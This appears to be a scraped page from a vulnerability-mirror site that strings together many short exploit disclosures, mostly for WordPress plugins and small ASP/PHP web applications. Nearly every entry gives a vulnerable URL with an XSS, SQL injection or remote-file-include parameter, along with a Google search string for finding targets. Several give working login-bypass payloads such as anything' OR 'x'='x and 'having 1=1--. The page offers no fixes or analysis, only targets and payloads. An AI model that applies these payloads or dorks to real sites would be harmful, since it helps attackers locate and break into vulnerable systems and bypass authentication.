Google Search

eGov Content Manager Cross Site Scripting Vulnerability

Only if your site is vulnerable we will disclose the details to site admin.




Google Search: (Index.exe)

http://www.google.com/search?hl=en&q=ext%3Aexe+inurl%3A%28Services%29&btnG=Search

Google Search: (Center.exe) 


Millions of PDF invisibly embedded with your internal disk paths

Search for this on your favorite search engine (Google/Bing)
------------------------------------------------------------
filetype:pdf file c (htm OR html OR mhtml)

Google Search 1 (for drive C)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+c+%28htm+OR+html+OR+mhtml%29&btnG=Search&aq=f&oq=&aqi=] – 4 million results
Google Search 2 (for drive D)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+d+%28htm+OR+html+OR+mhtml%29&btnG=Search&aq=f&oq=&aqi=] – 13 million results

RE: Millions of PDF invisibly embedded with your internal disk paths

Search for this on your favorite search engine (Google/Bing)
------------------------------------------------------------
filetype:pdf file c (htm OR html OR mhtml)

Google Search 1 (for drive C)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+c+%28htm+OR+html+OR+mhtml%29&btnG=Search&aq=f&oq=&aqi=] - 4 million results
Google Search 2 (for drive D)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+d+%28htm+OR+html+OR+mhtml%29&btnG=Search&aq=f&oq=&aqi=] - 13 million results

Wordpress the-welcomizer plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                  #
# Download......: http://wordpress.org/extend/plugins/the-welcomizer/                                              #
#                                                                                                                  #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss]           #
#                                                                                                                  #
# Google Search.: "Powered by Wordpress"                                                                           #
#                                                                                                                  #
####################################################################################################################
#                                                                                                                  #
# Bug Found.....: IrIsT.Ir                                                                                         #
#                                                                                                                  #

[Aria-Security.Net] BestWebApp Dating System SQL Injection

http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Original Advisory and more info about this vulnerability: http://forum.aria-security.net/showthread.php?p=1442
Vendor: http://www.bestwebapp.com
Google Search: inurl:login_form.asp DATING Website

Login_form.asp
Choose any username you want, doesn't matter, it can be admin, or just a normal user. YOU CHOOSE!
Password: anything' OR 'x'='x


[Aria-Security.Net] Real Estate Web SQL Injection

Aria-Security Team, 
http://Aria-Security.net
-------------------------------
Shout Outs:
Vendor: http://www.site2nite.com/
Google Search: Website Development Provided By: Site2Nite


Username: anything' OR 'x'='x
Password: anything' OR 'x'='x


Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                                          #
# Download......: http://wordpress.org/extend/plugins/1-jquery-photo-gallery-slideshow-flash/                                              #
#                                                                                                                                          #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss]     #
#                                                                                                                                          #
# Google Search.: "Powered by Wordpress"                                                                                                   #
#                                                                                                                                          #
############################################################################################################################################
#                                                                                                                                          #
# Bug Found.....: IrIsT.Ir                                                                                                                 #
#                                                                                                                                          #

Re: PunBB 1.3.6 bug

> #                                                                                                                   #
> # contact.......: Amir[at]IrIsT.ir                                                                                  #
> #                                                                                                                   #
> # Exploit.......: http://www.site.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1          #
> #                                                                                                                   #
> # Google Search.: "Powered By PunBB"                                                                                #
> #                                                                                                                   #
> # SP TNX........: B3HZ4D & satanicstar & SeCuRiTy & m3hdi & vahid4251 & all IrIsT members                           #
> # & h4ckcity.org & phc.ir & all SP                                                                                  #
> #                                                                                                                   #
> #####################################################################################################################

wordpress Flexible Custom Post Type plugin Xss Vulnerabilities

#                                                                                                                   #
# contact.......: Amir[at]IrIsT.ir                                                                                  #
#                                                                                                                   #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss]    #
#                                                                                                                   #
# Google Search.: "Powered By wordpress"                                                                            #
#                                                                                                                   #
# SP TNX........: B3HZ4D & satanicstar & SeCuRiTy & m3hdi & vahid4251 & all IrIsT members                           #
# & h4ckcity.org & phc.ir & zarbat.org & kalkalhacking.iranpanel.com & farbodmahini &all SP                         #
#                                                                                                                   #
#####################################################################################################################

[HSC] Dokeos Multiple Cross-Site Scripting Vulnerabilities

Google Search:

google:allinurl:"/auth/lostPassword.php"




Wordpress enable-latex plugin Remote File Include Vulnerabilities

#                                                                                                                              #
# Download......: http://wordpress.org/extend/plugins/enable-latex/                                                            #
#                                                                                                                              #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]?                               #
#                                                                                                                              #
# Google Search.: "Powered by Wordpress"                                                                                       #
#                                                                                                                              #
################################################################################################################################
#                                                                                                                              #
# Bug Found.....: Aria-Security                                                                                                #
#                                                                                                                              #

Re: Wordpress enable-latex plugin Remote File Include Vulnerabilities

> #                                                                                                                              #
> # Download......: http://wordpress.org/extend/plugins/enable-latex/                                                            #
> #                                                                                                                              #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]?                               #
> #                                                                                                                              #
> # Google Search.: "Powered by Wordpress"                                                                                       #
> #                                                                                                                              #
> ################################################################################################################################
> #                                                                                                                              #
> # Bug Found.....: Aria-Security                                                                                                #
> #                                                                                                                              #

Wordpress meenews 5.1 plugin Cross-Site Scripting Vulnerabilities

#                                                                                                          #
# Download......: http://wordpress.org/extend/plugins/meenews/                                             #
#                                                                                                          #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss]        #
#                                                                                                          #
# Google Search.: "Powered by Wordpress"                                                                   #
#                                                                                                          #
############################################################################################################
#                                                                                                          #
# Bug Found.....: Aria-Security                                                                            #
#                                                                                                          #

DNewsWeb Softwares Cross Site Scripting Vulnerability

/cgi-bin/dnewsweb.exe?utag=XSS




Google Search: (dnewsweb.exe)

http://www.google.com/search?hl=en&q=ext%3Aexe+inurl%3A%28%7Cdnewsweb.exe%7C%29&btnG=Search




Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                    #
# Download......: http://wordpress.org/extend/plugins/flash-album-gallery/                                           #
#                                                                                                                    #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss]             #
#                                                                                                                    #
# Google Search.: "Powered by Wordpress"                                                                             #
#                                                                                                                    #
######################################################################################################################
#                                                                                                                    #
# Bug Found.....: IrIsT.Ir                                                                                           #
#                                                                                                                    #

MataChat Cross-Site Scripting Vulnerabilities

#                                                                                                    #
# contact.......: Admin[at]IrIsT.ir                                                                  #
#                                                                                                    #
# Exploit.......: http://[site]/[path]/input.php?nickname=[XSS]&color=[XSS]                          #
#                                                                                                    #
# Google Search.: "Powered By MataChat"                                                              #
#                                                                                                    #
# SP TNX........: Dr.FlagHk & satanicstar & bl4ck-h4t-b0ys & all IrIsT members                       #
#                                                                                                    #
######################################################################################################


Wordpress featurific-for-wordpress plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                                        #
# contact.......: Amir[at]IrIsT.ir                                                                                                       #
#                                                                                                                                        #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss]                     #
#                                                                                                                                        #
# Google Search.: "Powered by Wordpress"                                                                                                 #
#                                                                                                                                        #
# Me............:  IrIsT.Ir = (Amir)  &   Aria-security.com = ( The-0utl4w )                                                             #
#                                                                                                                                        #
##########################################################################################################################################


Wordpress alert-before-your-post Plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                         #
# contact.......: Amir[at]IrIsT.ir                                                                                        #
#                                                                                                                         #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss]    #
#                                                                                                                         #
# Google Search.: "Powered by Wordpress"                                                                                  #
#                                                                                                                         #
# SP TNX........: B3HZ4D & joker_s & The-0utl4w & m3hdi & vahid4251 & all IrIsT members                                   #
#                                                                                                                         #
#                & h4ckcity.org & phcsec.ir & zarbat.org & kalkalhacking.orq.ir & all SP                                  #
#                                                                                                                         #

Re: Wordpress pretty-link.1.5.2 plugin Cross-Site Scripting Vulnerabilities

> #                                                                                                                                          #
> # Download......: http://wordpress.org/extend/plugins/pretty-link/                                                                         #
> #                                                                                                                                          #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss]                                       #
> #                                                                                                                                          #
> # Google Search.: "Powered by Wordpress"                                                                                                   #
> #                                                                                                                                          #
> ############################################################################################################################################
> #                                                                                                                                          #
> # Bug Found.....: IrIsT.Ir                                                                                                                 #
> #                                                                                                                                          #

IPortalX Forums Cross-Site Scripting Vulnerability

http://img296.imageshack.us/img296/1318/hack1br6.jpg



Google Search:

http://www.google.com/search?hl=en&q=%2Fforum%2Flogin_user.asp%3FRedirect%3D%2F&btnG=Google+Search




Boinc Forum Cross Site Scripting Vulnerability

/forum_text_search_action.php?search_string=<XSS>&titles=Search
/forum_text_search_action.php?search_string=<XSS>&bodies=Search



Google Search:

http://www.google.com/search?hl=en&q=Powered+by+BOINC&btnG=Search




Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                  #
# Download......: http://wordpress.org/extend/plugins/skysa-official/                                              #
#                                                                                                                  #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss]              #
#                                                                                                                  #
# Google Search.: "Powered by Wordpress"                                                                           #
#                                                                                                                  #
####################################################################################################################
#                                                                                                                  #
# Bug Found.....: IrIsT.Ir                                                                                         #
#                                                                                                                  #

Re: Wordpress enable-latex plugin Remote File Include Vulnerabilities

> #                                                                                                                              #
> # Download......: http://wordpress.org/extend/plugins/enable-latex/                                                            #
> #                                                                                                                              #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]?                               #
> #                                                                                                                              #
> # Google Search.: "Powered by Wordpress"                                                                                       #
> #                                                                                                                              #
> ################################################################################################################################
> #                                                                                                                              #
> # Bug Found.....: Aria-Security                                                                                                #
> #                                                                                                                              #

Wordpress clickdesk-live-support-chat plugin Cross-Site Scripting Vulnerabilities

#                                                                                                                              #
# contact.......: Amir[at]IrIsT.ir                                                                                             #
#                                                                                                                              #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss]     #
#                                                                                                                              #
# Google Search.: "Powered by Wordpress"                                                                                       #
#                                                                                                                              #
# Me............:  IrIsT.Ir  &   Aria-security.com                                                                             #
#                                                                                                                              #
################################################################################################################################


Aria-Security.Net Research: Rapid Classified HotList Image

http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://www.freshink.net/rc-links.htm
Demo: http://www.lite.freshink.net/admin_logon.asp
Google Search: Developed by: GA Soft

Username: anything' OR 'x'='x
password: anything' OR 'x'='x

Regards,

DocuSafe "Search" SQL Injection

Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System

insert your command in the section "search"
example:
'having 1=1--
Result:

Wordpress adminimize Plugin Vulnerabilities

#                                                                                                                   #
# contact.......: Amir[at]IrIsT.ir                                                                                  #
#                                                                                                                   #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/adminimize/adminimize_page.php?page=[xss]           #
#                                                                                                                   #
# Google Search.: "Powered by Wordpress"                                                                            #
#                                                                                                                   #
#                                                                                                                   #
# SP TNX........: B3HZ4D & joker_s & The-0utl4w & m3hdi & vahid4251 & all IrIsT members                             #
# & h4ckcity.org & phcsec.ir & zarbat.org & all SP                                                                  #
#                                                                                                                   #

Max's Guestbook (XSS) Remote Vulnerability

%% Discovered on: 10 December 2008
%% Name: Max's Guestbook
%% Version: 1.0
%% URL: http://www.phpf1.com/product/php-guestbook-script.html
%% URL2: http://www.hotscripts.com/Detailed/78571.html
%% Google Search: intitle:"Max's Guestbook" powered-by-PHP-F1
%% 
%% 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%



Exploit

#                                                                             #
# contact.......: Admin [at] IrIsT.ir                                         #
#                                                                             #
# Exploit.......: http://[site]/[path]/?page=[XsS]&mode=search                #
#                                                                             #
# Google Search.: "Powered By BizDirectory 2.04" Or Inurl:"BizDirectory2.04"  #
#                                                                             #
# SP TNX........: dr.flaghk                                                     #
#                                                                             #
###############################################################################



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
